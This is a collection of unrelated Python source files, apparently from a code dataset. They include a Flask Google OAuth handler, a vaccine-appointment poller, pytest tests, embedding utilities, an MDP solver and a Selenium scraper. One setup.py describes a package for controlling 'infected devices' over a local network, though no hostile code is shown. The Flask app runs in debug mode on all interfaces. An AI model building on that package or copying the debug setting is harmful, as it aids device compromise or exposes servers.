# Check that the access token is valid.
access_token = credentials.access_token
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'
% access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# If there was an error in the access token info, abort.
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is used for the intended user.
gplus_id = credentials.id_token['sub']
if result['user_id'] != gplus_id:
response = make_response(
json.dumps("Token's user ID doesn't match given user ID."), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is valid for this app.
if result['issued_to'] != CLIENT_ID:
response = make_response(
json.dumps("Token's client ID does not match app's."), 401)
print "Token's client ID does not match app's."
response.headers['Content-Type'] = 'application/json'
return response
stored_access_token = login_session.get('access_token')
stored_gplus_id = login_session.get('gplus_id')
if stored_access_token is not None and gplus_id == stored_gplus_id:
response = make_response(
json.dumps('Current user is already connected.'), 200)
response.headers['Content-Type'] = 'application/json'
return response
# Store the access token in the session for later use.
login_session['access_token'] = credentials.access_token
login_session['gplus_id'] = gplus_id
# Get user info
userinfo_url = "https://www.googleapis.com/oauth2/v1/userinfo"
params = {'access_token': credentials.access_token, 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = answer.json()
login_session['provider'] = 'google'
login_session['username'] = data['name']
login_session['email'] = data['email']
# Check if user exists.
user_id = getUserId(login_session['email'])
# If not, create User.
if user_id is None:
user_id = createUser(login_session)
login_session['user_id'] = user_id
userinfo = getUserInfo(user_id)
login_session['is_admin'] = userinfo.is_admin
output = 'Done!'
flash("you are now logged in as %s" % login_session['username'])
return output
# Disconnect based on provider
@app.route('/disconnect')
def disconnect():
"""
Revoke the current auth session token.
Delete existing login_session data.
:return:
redirect
"""
if 'provider' in login_session:
if login_session['provider'] == 'google':
gdisconnect()
del login_session['gplus_id']
del login_session['access_token']
del login_session['username']
del login_session['email']
del login_session['user_id']
del login_session['provider']
flash("You have successfully been logged out.")
return redirect(url_for('Catalog'))
else:
flash("You were not logged in")
return redirect(url_for('Catalog'))
@app.route('/gdisconnect')
def gdisconnect():
"""
Revoke the current user's google auth token.
:return:
JSON 200 "Successfully disconnected" response
"""
# Only disconnect a connected user.
access_token = login_session.get('access_token')
if access_token is None:
response = make_response(
json.dumps('Current user not connected.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token
h = httplib2.Http()
result = h.request(url, 'GET')[0]
if result['status'] == '200':
response = make_response(json.dumps('Successfully disconnected.'), 200)
response.headers['Content-Type'] = 'application/json'
return response
else:
response = make_response(
json.dumps('Failed to revoke token for given user.', 400)
)
response.headers['Content-Type'] = 'application/json'
return response
def createUser(login_session):
"""
Create a new user in database table 'user'
:param login_session: (DBSession) login_session
:return:
User.id integer from newly created user row.
"""
session = DBSession()
newUser = User(email=login_session['email'])
session.add(newUser)
session.commit()
user = session.query(User).filter_by(email=login_session['email']).one()
return user.id
def getUserId(email):
"""
Retrieve an existing user id using an email address
:param email: (string)
:return:
User.id integer
"""
session = DBSession()
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except SQLAlchemyError:
return None
def getUserInfo(id):
"""
Retrieve an existing user's data.
:param id: (integer) User.id
:return:
'user' row data
"""
session = DBSession()
try:
user = session.query(User).filter_by(id=id).one()
return user
except SQLAlchemyError:
return None
if __name__ == '__main__':
app.secret_key = ''.join(random.choice(
string.ascii_uppercase + string.digits) for x in xrange(32))
app.debug = True
app.run(host='0.0.0.0', port=5000)
# Uncomment for https
# app.run(host='0.0.0.0', port=5000, ssl_context='adhoc')
|
StarcoderdataPython
|
3233500
|
import sys
import beepy
import datetime as dt
import os
import time
from random import randint
import http.client
import json
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
"""
This Script uses an API endpoint to determine if a vaccination is available.
This Script assumes:
1. You already got your registration code
2. You used your registration code for the appropriate vaccination center while tracking your network.
You then caught your authentication credentials (check readme)
"""
#Config
########
registration_code_sindelfinden = "" # insert registration code
authorization_sindelfinden = "Basic " # insert authentication credential
########
payload={}
headers = \
{
'Connection': 'keep-alive',
'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
'Accept': 'application/json, text/plain, */*',
'Cache-Control': 'no-cache',
'Authorization': "",
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',
'Content-Type': 'application/json',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': "",
'Accept-Language': 'de-DE,de;q=0.9',
}
# list with dicts.
# each dict contains the info to get an appointment at one vaccination center
# you have to reference the correct data for each vaccination center.
info_list= \
[
{
"Stadt": "Sindelfinden",
"url": "229-iz.impfterminservice.de",
"plz" : "71065",
'Authorization': f'{authorization_sindelfinden}',
'Referer': f'https://229-iz.impfterminservice.de/impftermine/suche/{registration_code_sindelfinden}/71065',
},
# {
# "Stadt": "Heidelberg",
# "url": "001-iz.impfterminservice.de",
# "plz" : "69124",
# 'Authorization': f'Basic {}',
# 'Referer': f'https://001-iz.impfterminservice.de/impftermine/suche/{}/69124',
# },
]
def call_request_dict():
"""
Check API if a vaccination appintment is available in the requested center for your registration code.
If an appointmenr is available there will be an audio notification.
:return: boolean or string
booloean: False if appointment was not found
string: If appointmenr was found, the string will contain the url to the vaccination center with
the registration-code included in the URL.
"""
for dic in info_list:
headers["Authorization"] = dic["Authorization"]
headers["Referer"] = dic["Referer"]
print(f"{dt.datetime.now()} requesting : {dic['Referer']}")
conn = http.client.HTTPSConnection(dic["url"])
payload = ''
conn.request("GET", f"/rest/suche/impfterminsuche?plz={dic['plz']}", payload, headers)
response = conn.getresponse()
response_byte = response.read()
response_str = response_byte.decode("utf-8")
#print(response.json())
if response.getcode() != 200:
print(response.status_code)
continue
response_dict = json.loads(response_str)
if ( (len(response_dict["termine"]) > 0) or (len(response_dict["termineTSS"]) > 0) or \
(len(response_dict["praxen"].keys()) > 0) ):
print(dic["Stadt"], response_dict)
beepy.beep(sound=4)
return dic["Referer"]
return False
def create_browser_site(url):
"""
Creates a chrome instance if an appointment was found.
:param url: string
url to the vaccination center. URL will include registration code
:return: selenium.webdriver
instance of webdriver. This is required to keep Chrome open, after this script leaved this function.
"""
chrome_options = Options()
chrome_options.add_experimental_option("detach", True)
driver = webdriver.Chrome(driver_path, options=chrome_options)
valid_str = "termine suchen"
str_found = False
while str_found == False:
driver.get(url)
body = driver.find_elements_by_tag_name("body")[0]
time.sleep(2)
str_found = valid_str in body.text.lower()
if str_found == True:
print("blub")
break
return driver
if __name__ == "__main__":
# you need to have chrome installed. Chromedriver must be in the same directory as this script
if os.name == "nt":
driver_path = ".\chromedriver.exe"
driver = webdriver.Chrome("./chromedriver")
result = False
while result == False:
result = call_request_dict()
if result != False:
create_browser_site(result)
quit()
sys.exit()
break
time.sleep(randint(8, 13))
|
StarcoderdataPython
|
8117854
|
<filename>tests/test_cinefiles.py
import pytest, os, shutil
import glob
from pprint import pprint
from lxml import html
import cinefiles.cinefiles as cf
def test_import():
import cinefiles
movies = [ '5th Element','Amour','Astronaut Farmer',
'Down Periscope','Grand Budapest Hotel, The (2014)',
'Interstellar (2014)','Invisible War, The',
'Men Who Stare at Goats, The','Mulan (1998)',
'Soylent Green (1973)','Thin Red Line']
@pytest.fixture(scope='module')
def directoryA(tmpdir_factory):
testbed = tmpdir_factory.mktemp('testA')
for m in movies:
tempmovie = testbed.mkdir('/'+m).join('/movie.mp4')
tempmovie.write('movie code')
return testbed
def test_directoryA(directoryA):
assert os.path.exists(str(directoryA)+'/Thin Red Line/movie.mp4')
@pytest.fixture(scope='module')
def examples(tmpdir_factory):
safe_examples = tmpdir_factory.mktemp('safe_examples')
shutil.copytree('examples',str(safe_examples)+'/examples')
return safe_examples.join('examples')
def test_safe_examples_dir(examples):
assert os.path.exists(str(examples)+'/run_cf.py')
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_examplerunA(directoryA, examples, monkeypatch):
monkeypatch.chdir(examples)
import cinefiles.cinefiles as cf
import logging
search = cf.Cinefiles(configfile=str(examples)+'/cinefiles.ini')
#we must change searchfolder to temporary directory
search.configdict.update({'searchfolder':str(directoryA)})
search.run()
#check basic structure
for item in directoryA.listdir():
if(item.isdir()):
foldername = str(item).split('/')[-1]
print(foldername)
if(foldername != 'cinefiles' and foldername != '.cinefiles'):
index = item.join('/index.htm')
assert index.exists()
@pytest.fixture(scope='session')
def dirA_complete(tmpdir_factory):
testbed = tmpdir_factory.mktemp('testA_complete')
for m in movies:
tempmovie = testbed.mkdir('/'+m).join('/movie.mp4')
tempmovie.write('movie code')
search = cf.Cinefiles(searchfolder=str(testbed))
search.run()
return testbed
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_checkarchive(dirA_complete, monkeypatch):
monkeypatch.chdir(dirA_complete)
assert dirA_complete.join('/5th Element/index.htm').exists()
newsearch = cf.Cinefiles(searchfolder=str(dirA_complete))
# newsearch.run()
it = os.scandir(str(dirA_complete))
for entry in it:
if entry.is_dir():
subit = os.scandir(entry.path)
for subentry in subit:
if(subentry.name == 'archive.log' or subentry.name == '.archive.log'):
assert newsearch.checkarchive(subentry)
#all of these movies have all 3 reviews
moviesB = [ '5th Element','Grand Budapest Hotel, The (2014)',
'Interstellar (2014)','Thin Red Line']
@pytest.fixture(scope='session')
def directoryB(tmpdir_factory):
testbed = tmpdir_factory.mktemp('testB')
for m in moviesB:
tempmovie = testbed.mkdir('/'+m).join('/movie.mp4')
tempmovie.write('movie code')
search = cf.Cinefiles(searchfolder=str(testbed))
search.run()
return testbed
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_metadata(directoryB):
newsearch = cf.Cinefiles(searchfolder=str(directoryB))
for m in moviesB:
pathobj = directoryB.join('/'+m)
resultdict = newsearch.getattrfrommetadata(str(pathobj))
print(str(pathobj))
for key in resultdict:
if(key != 'indexfile'):
#indexfile is set later
print(key)
assert resultdict[key] != ''
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_masterindex_imdb(directoryB):
masterindex = directoryB.join('/index.htm')
htmlstring = ''
for line in masterindex.readlines():
htmlstring += line
tree = html.fromstring(htmlstring)
results = tree.xpath('//td[@class="rowimdb"]')
for r in results:
assert r.text_content != ''
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_masterindex_meta(directoryB):
masterindex = directoryB.join('/index.htm')
htmlstring = ''
for line in masterindex.readlines():
htmlstring += line
tree = html.fromstring(htmlstring)
results = tree.xpath('//td[@class="rowmeta"]')
for r in results:
assert r.text_content != ''
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_masterindex_meta(directoryB):
masterindex = directoryB.join('/index.htm')
htmlstring = ''
for line in masterindex.readlines():
htmlstring += line
tree = html.fromstring(htmlstring)
results = tree.xpath('//td[@class="rowroger"]')
for r in results:
assert r.text_content != ''
@pytest.fixture(scope='function')
def min_ini(tmpdir_factory):
minimal = tmpdir_factory.mktemp('minimal')
config = minimal.join('/cinefiles.ini')
config.write('[cinefiles]\n searchfolder=none\n')
return minimal
def test_no_args(min_ini,monkeypatch):
monkeypatch.chdir(min_ini)
tc = cf.Cinefiles()
assert tc.configdict['searchfolder'] == 'none'
@pytest.fixture(scope='function')
def blank_folder(tmpdir_factory):
return tmpdir_factory.mktemp('blank')
def test_no_conf(blank_folder,monkeypatch):
monkeypatch.chdir(blank_folder)
with pytest.raises(IOError) as err:
tc = cf.Cinefiles()
@pytest.fixture(scope='function')
def broken_ini(tmpdir_factory):
broken = tmpdir_factory.mktemp('minimal')
config = broken.join('/cinefiles.ini')
config.write('\n')
return broken
def test_broken_conf(broken_ini,monkeypatch):
monkeypatch.chdir(broken_ini)
with pytest.raises(ValueError) as err:
tc = cf.Cinefiles()
def test_onwindows():
assert not cf.running_on_windows()
def test_main(script_runner):
ret = script_runner.run('./cinefiles')
def test_fullsetup():
full = cf.Cinefiles(guess=False,skip=False,test=False,destroy=False,
debugnum=3,localresources=False,searchfolder=False)
for key in {'guess','skip','test','destroy','localresources','searchfolder'}:
assert full.configdict[key] == False
assert full.configdict['debugnum'] == 3
def recurseprint(directoryobj,tabnum=0):
for item in directoryobj.listdir():
print('\t'*tabnum+item.basename, end='')
if(item.isdir()):
print('/')
recurseprint(item,tabnum+1)
else:
print('')
|
StarcoderdataPython
|
11266130
|
<reponame>michael-huber2772/portfolio-dashboard
# Generated by Django 3.1.2 on 2020-10-27 10:59
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0002_product_productprice'),
]
operations = [
migrations.AlterField(
model_name='productprice',
name='start_date',
field=models.DateTimeField(default=datetime.datetime(2020, 10, 27, 4, 59, 6, 739693), null=True),
),
]
|
StarcoderdataPython
|
5097647
|
<filename>utils/embedding_utils.py
import numpy as np
import gensim
class Embedding:
def __init__(self, f, corpus, max_document_length):
if ".txt" in f:
model = gensim.models.KeyedVectors.load_word2vec_format(f, binary=False)
else:
model = gensim.models.KeyedVectors.load_word2vec_format(f, binary=True)
wordSet = set(['"'])
for sen in corpus:
words = sen.split()
for w in words:
if w in model:
wordSet.add(w)
vocab_size = len(wordSet)
print("%d unique tokens have been found!" % vocab_size)
embedding_dim = model.syn0.shape[1]
word2id = {"<PAD>":0}
id2word = {0:"<PAD>"}
word2id = {"<UNK>":1}
id2word = {1:"<UNK>"}
embedding = np.zeros((vocab_size+2, embedding_dim))
np.random.seed(0)
#embedding[0, :] = np.random.uniform(-1, 1, embedding_dim)
embedding[1, :] = np.random.uniform(-1, 1, embedding_dim)
for i, word in enumerate(wordSet):
word2id[word] = i+2
id2word[i+2] = word
embedding[i+2, :] = model[word]
self.vocab_size = vocab_size + 2
self.embedding_dim = embedding_dim
self.word2id = word2id
self.id2word = id2word
self.embedding = embedding
self.max_document_length = max_document_length
self.position_size = self.max_document_length * 2 + 1
def _text_transform(self, s, maxlen):
if not isinstance(s, str):
s = ""
words = s.split()
vec = []
for w in words:
if w == "''":
w = '"'
if w in self.word2id:
vec.append(self.word2id[w])
else:
vec.append(1)
for i in range(len(words), maxlen):
vec.append(0)
return vec[:maxlen]
def _len_transform(self, s, maxlen):
if not isinstance(s, str):
s = ""
length = len(s.split())
return min(length, maxlen)
def text_transform(self, s):
return self._text_transform(s, self.max_document_length)
def len_transform(self, s):
return self._len_transform(s, self.max_document_length)
def position_transform(self, s):
x1, y1, x2, y2 = s
vec1 = []
vec2 = []
for i in range(self.max_document_length):
if i < x1:
vec1.append(i-x1)
elif i > y1:
vec1.append(i-y1)
else:
vec1.append(0)
if i < x2:
vec2.append(i-x2)
elif i > y2:
vec2.append(i-y2)
else:
vec2.append(0)
vec1 = [np.clip(p+self.max_document_length, 0, self.position_size-1) for p in vec1]
vec2 = [np.clip(p+self.max_document_length, 0, self.position_size-1) for p in vec2]
return [vec1, vec2]
|
StarcoderdataPython
|
1791557
|
from setuptools import setup
def readme():
with open('README.md') as f:
README = f.read()
return README
setup(
name='master-slave',
version='1.0.0',
description='package to communicate with infected devices trought a local network',
long_description=readme(),
long_description_content_type='text/markdown',
url='https://github.com/Skorii/ProjetPython2019',
author='Arnaud "Skorii" Gony',
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
],
packages=['master_slave'],
include_package_data=True,
install_requires=['argparse', 'datetime', 'logging', 'os', 'platform', 'psutil', 're', 'requests', 'shutil', 'socket', 'threading', 'time', 'uuid'],
entry_points={
"console_scripts": [
"master = master_slave.master:main",
"slave = master_slave.slave:main",
],
},
)
|
StarcoderdataPython
|
3549887
|
<filename>Security/src/proj_brlp.py
import csv
import cvxopt
from cvxopt import solvers
import numpy as np
A_mat = []
R_mat = []
alpha = []
G = []
h = []
high_entropy_policy = []
class State:
def __init__(self, ind, name, actions):
self.index = ind
self.name = name
self.possibleActions = actions
self.transition = []
self.reward = []
self.terminating = False
self.utility = 0
def __repr__(self):
return "Index: " + str(self.index) + " Name: " + self.name + " Actions: " + str(self.possibleActions)
#def __str__(self):
# print "Index: " + str(self.index) + " Name: " + self.name + " Actions: " + str(self.possibleActions)
def modifyActions(self, actions):
self.possibleActions = actions
def setTransition(self, tran):
self.transition = tran
def getTransition(self):
return self.transition
def setReward(self, reward):
self.reward = reward
def getReward(self):
return self.reward
def getIndex(self):
return self.index
def getPossibleActions(self):
return self.possibleActions
def setPossibleActions(self, act):
self.possibleActions = act
def isTerminating(self):
return self.terminating
def setTerminating(self, term):
self.terminating = term
if term == True:
self.possibleActions = []
def setUtility(self, util):
self.utility = util
def getUtility(self):
return self.utility
class Action:
def __init__(self, ind, name):
self.index = ind
self.name = name
def __repr__(self):
return "Index: " + str(self.index) + " Name: " + self.name
def getIndex(self):
return self.index
class MDP:
def __init__(self, numberOfStates, numberOfActions):
self.numberOfStates = numberOfStates
self.numberOfActions = numberOfActions
self.numberOfOptions = 0
self.states = []
self.actions = []
self.options = []
# Define Action
def initializeActions(self):
for i in xrange(0, self.numberOfActions):
a = Action(i, str("a" + str(i)))
self.actions.append(a)
# Define States
def initializeStates(self):
for i in xrange(0, self.numberOfStates):
x = State(i, str("s" + str(i)), self.actions[0:self.numberOfActions-1])
self.states.append(x)
self.states[3].setTerminating(True)
self.states[3].setUtility(1)
self.states[3].setPossibleActions([self.actions[self.numberOfActions-1]])
self.states[7].setTerminating(True)
self.states[7].setUtility(-1)
self.states[7].setPossibleActions([self.actions[self.numberOfActions - 1]])
# Leave one line space after each transition table for each action in the data file.
# TransitionFunction For Acti
def autoTransitionFunction(self, gamma=1):
for s in self.states:
s.setTransition([])
stateIndex = 0
actionIndex = 0
with open('transitionData', 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
if len(row) == 0:
stateIndex = 0
actionIndex = actionIndex + 1
continue
for sp in xrange(0, self.numberOfStates):
triple = (actionIndex, sp, float(row[sp])*gamma)
self.states[stateIndex].getTransition().append(triple)
stateIndex += 1
# RewardFunctions For Actions
def autoRewardFunction(self):
tosend = []
stateIndex = 0
with open('rewardData', 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
if len(row)==0:
continue
for ap in xrange(0, self.numberOfActions):
triple = (ap, float(row[ap]))
tosend.append(triple)
self.states[stateIndex].setReward(tosend)
tosend = []
stateIndex += 1
def generateLPAc(self):
decisionvar = []
for x in self.states:
triple = []
for y in self.states:
triplet = []
for a in y.possibleActions:
if x.getIndex() == y.getIndex():
triplet.append(float(1))
else:
triplet.append(float(0))
triple.append(triplet)
decisionvar.append(triple)
for x in self.states:
incoming = []
for s in self.states:
for t in s.transition:
if t[1]==x.getIndex() and t[2]!=0:
incoming.append((s, t[0], t[2]))
for h in incoming:
decisionvar[x.getIndex()][h[0].getIndex()][h[1]] -= float(h[2])
for x in decisionvar:
lit = []
for t in x:
lit.extend(t)
A_mat.append(lit)
# for x in self.states:
# for r in x.reward:
# R_mat.append(float(r[1]))
for x in self.states:
for y in x.possibleActions:
for r in x.reward:
if r[0]==y.getIndex():
R_mat.append(r[1])
#print R_mat
# for x in A_mat:
# print x
class Driver:
a = MDP(12, 5)
a.initializeActions()
a.initializeStates()
a.autoTransitionFunction()
a.autoRewardFunction()
a.generateLPAc()
# print a.states[0].transition
def solveLP(beta):
global R_mat, A_mat, alpha, G, h, high_entropy_policy
G = np.add(beta * high_entropy_policy, -1 * np.identity(np.shape(R_mat)[0]))
A = cvxopt.matrix(A_mat)
b = cvxopt.matrix(alpha)
c = cvxopt.matrix(R_mat)
G = cvxopt.matrix(G)
h = cvxopt.matrix(h)
sol = solvers.lp(c, G, h, A, b)
x_mat = np.array(sol['x'])
optimal_solution = np.dot(R_mat.T, x_mat)
return x_mat, -1*optimal_solution[0][0]
def brlp(Emin):
beta_low = 0.0
beta_high = 1.0
beta = (beta_low + beta_high)/2
epsilon = 0.01
x_mat, optimal_solution = solveLP(beta)
while abs(optimal_solution - Emin) > epsilon :
if optimal_solution > Emin:
beta_low = beta
else:
beta_high = beta
beta = (beta_low + beta_high)/2
x_mat, optimal_solution = solveLP(beta)
print("========================================================")
print("Optimal Solution :", optimal_solution)
print("========================================================")
return x_mat
def pre_lpSolver():
global R_mat, A_mat, alpha, G, h, high_entropy_policy
count = 0
high_entropy_policy = np.zeros((len(R_mat), len(R_mat)))
for i in range(len(A_mat)):
if(i == 3 or i == 7):
high_entropy_policy[count][count] = 1.0
count += 1
else:
for j in range(4):
for k in range(4):
high_entropy_policy[count + j][count + k] = 0.25
count += 4
R_mat = -1 * np.array(R_mat)[np.newaxis].T
A_mat = np.array(A_mat)
alpha = np.zeros((np.shape(A_mat)[0], 1))
h = np.zeros((np.shape(R_mat)[0], 1))
alpha[8][0] = 1.0
def calc_entropy(x_mat):
count = 0
policy = np.zeros(np.shape(R_mat)[0])
for i in range(np.shape(A_mat)[0]):
if i == 3 or i == 7:
policy[count] = 1
count += 1
else:
temp = 0
for j in range(4):
temp += x_mat[count + j]
for j in range(4):
policy[count + j] = x_mat[count + j]/temp
count += 4
entropy = 0
print(policy)
for i in range(len(policy)):
entropy += -1 * policy[i] * np.log(policy[i])
print('Using additive entropy matrix, entropy obtained', entropy)
pre_lpSolver()
x_mat = brlp(0.4)
calc_entropy(x_mat)
# R_mat 1x42
# A_mat 12x42
|
StarcoderdataPython
|
3277716
|
MAKEFILE_BASE = """
clean: netsim-clean nso-clean ansible-clean
dev: netsim start-netsim nso dev-sync-to deploy-dev
nso:
-@ncs-setup --dest .
-@echo "Starting local NSO instance..."
-@ncs
ansible-clean:
-@rm *.retry > /dev/null
start-netsim:
-@ncs-netsim start
netsim-clean:
-@echo "Stopping All Netsim Instances..."
-@killall confd
-@rm -Rf netsim/
-@rm README.netsim
nso-clean:
-@echo "Stopping NSO..."
-@ncs --stop
-@rm -Rf README.ncs agentStore state.yml logs/ ncs-cdb/ ncs-java-vm.log ncs-python-vm.log ncs.conf state/ storedstate target/
deploy-dev:
-@ansible-playbook -i inventory/dev.yaml site.yaml
deploy:
-@ansible-playbook -i inventory/prod.yaml site.yaml
dev-sync-to:
-@echo "Performing devices sync-to..."
-@curl -X POST -u admin:admin http://localhost:8080/api/running/devices/_operations/sync-from
sync-to:
-@echo "Performing devices sync-to..."
-@curl -X POST -u admin:admin {base_url}/api/running/devices/_operations/sync-from
sync-from:
-@echo "Performing devices sync-from..."
-@curl -X POST -u admin:admin {base_url}/api/running/devices/_operations/sync-from
"""
|
StarcoderdataPython
|
3287982
|
<filename>Test/astc_size_binary.py
#!/usr/bin/env python3
# SPDX-License-Identifier: Apache-2.0
# -----------------------------------------------------------------------------
# Copyright 2019-2020 Arm Limited
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# -----------------------------------------------------------------------------
"""
The ``astc_size_binary`` utility provides a wrapper around the Linux ``size``
utility to view binary section sizes, and optionally compare the section sizes
of two binaries. Section sizes are given for code (``.text``), read-only data
(``.rodata``), and zero initialized data (``.bss``). All other sections are
ignored.
A typical report comparing the size of a new binary against a reference looks
like this:
.. code-block::
Code RO Data ZI Data
Ref 411298 374560 128576
New 560530 89552 31744
Abs D 149232 -285008 -96832
Rel D 36.28% -76.09% -75.31%
"""
import argparse
import shutil
import subprocess as sp
import sys
def run_size(binary):
"""
Run size on a single binary.
Args:
binary (str): The path of the binary file to process.
Returns:
tuple(int, int, int): A triplet of code size, read-only data size, and
zero-init data size, all in bytes.
Raises:
CalledProcessException: The ``size`` subprocess failed for any reason.
"""
args = ["size", "--format=sysv", binary]
result = sp.run(args, stdout=sp.PIPE, stderr=sp.PIPE,
check=True, universal_newlines=True)
data = {}
patterns = {"Code": ".text", "RO": ".rodata", "ZI": ".bss"}
lines = result.stdout.splitlines()
for line in lines:
for key, value in patterns.items():
if line.startswith(value):
size = float(line.split()[1])
data[key] = size
return (data["Code"], data["RO"], data["ZI"])
def parse_command_line():
"""
Parse the command line.
Returns:
Namespace: The parsed command line container.
"""
parser = argparse.ArgumentParser()
parser.add_argument("bin", type=argparse.FileType("r"),
help="The new binary to size")
parser.add_argument("ref", nargs="?", type=argparse.FileType("r"),
help="The reference binary to compare against")
return parser.parse_args()
def main():
"""
The main function.
Returns:
int: The process return code.
"""
args = parse_command_line()
# Preflight - check that size exists. Note that size might still fail at
# runtime later, e.g. if the binary is not of the correct format
path = shutil.which("size")
if not path:
print("ERROR: The 'size' utility is not installed on the PATH")
return 1
# Collect the data
try:
newSize = run_size(args.bin.name)
if args.ref:
refSize = run_size(args.ref.name)
except sp.CalledProcessError as ex:
print("ERROR: The 'size' utility failed")
print(" %s" % ex.stderr.strip())
return 1
# Print the basic table of absolute values
print("%8s % 8s % 8s % 8s" % ("", "Code", "RO Data", "ZI Data"))
if args.ref:
print("%8s % 8u % 8u % 8u" % ("Ref", *refSize))
print("%8s % 8u % 8u % 8u" % ("New", *newSize))
# Print the difference if we have a reference
if args.ref:
diffAbs = []
diffRel = []
for refVal, newVal in zip(refSize, newSize):
diff = newVal - refVal
diffAbs.append(diff)
diffRel.append((diff / refVal) * 100.0)
dat = ("Abs D", diffAbs[0], diffAbs[1], diffAbs[2])
print("%8s % 8u % 8u % 8u" % dat)
dat = ("Rel D", diffRel[0], diffRel[1], diffRel[2])
print("%8s % 7.2f%% % 7.2f%% % 7.2f%%" % dat)
return 0
if __name__ == "__main__":
sys.exit(main())
|
StarcoderdataPython
|
267361
|
<reponame>nilsvu/spectre
# Distributed under the MIT License.
# See LICENSE.txt for details.
import numpy as np
def compute_piecewise(x, rotor_radius, inner_value, outer_value):
radius = np.sqrt(np.square(x[0]) + np.square(x[1]))
if (radius > rotor_radius):
return outer_value
else:
return inner_value
def rest_mass_density(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return compute_piecewise(x, rotor_radius, inner_density, outer_density)
def spatial_velocity(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
omega = compute_piecewise(x, rotor_radius, angular_velocity, 0.0)
return np.array([-x[1] * omega, x[0] * omega, 0.0])
def specific_internal_energy(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index):
return (1.0 / (adiabatic_index - 1.0) * compute_pressure(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index) / rest_mass_density(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index))
def compute_pressure(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return pressure
def lorentz_factor(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
v = spatial_velocity(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index)
return 1. / np.sqrt(1. - np.dot(v, v))
def specific_enthalpy(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return (1.0 + adiabatic_index * specific_internal_energy(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index))
def magnetic_field(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return np.array(magnetic_field)
def divergence_cleaning_field(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index):
return 0.0
|
StarcoderdataPython
|
6402217
|
<filename>code/WV.py
# https://dhhr.wv.gov/COVID-19/Pages/default.aspx
import csv
from datetime import datetime
import json
import os
from urllib.request import urlopen, Request
import requests
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from bs4 import BeautifulSoup
import time
def run_hist():
# Using Selenium
# driver = webdriver.Safari()
driver = webdriver.Chrome(executable_path="andrew/ChromeDriver/chromedriver.exe")
driver.maximize_window()
driver.get("https://dhhr.wv.gov/COVID-19/Pages/default.aspx")
time.sleep(7)
frame = driver.find_element_by_xpath('//*[@id="responsive"]/iframe')
driver.execute_script("return arguments[0].scrollIntoView(true);", frame)
driver.switch_to.frame(frame)
time.sleep(2)
out = {}
# Click Positive Case Trends
driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[17]/transform/div/div[3]/div/visual-modern/div/button').click()
time.sleep(2)
cum_cases_div = driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[4]/transform/div/div[3]/div/visual-modern/div')
actionChains = ActionChains(driver)
actionChains.context_click(cum_cases_div).pause(3).send_keys(Keys.ENTER).perform()
time.sleep(2)
# Click Lab Test Trends
# Click Hospital
def get_data(out_county, tables, county_list):
now = str(datetime.now())
for table in tables:
sum_county = 0
for segment in table[0]:
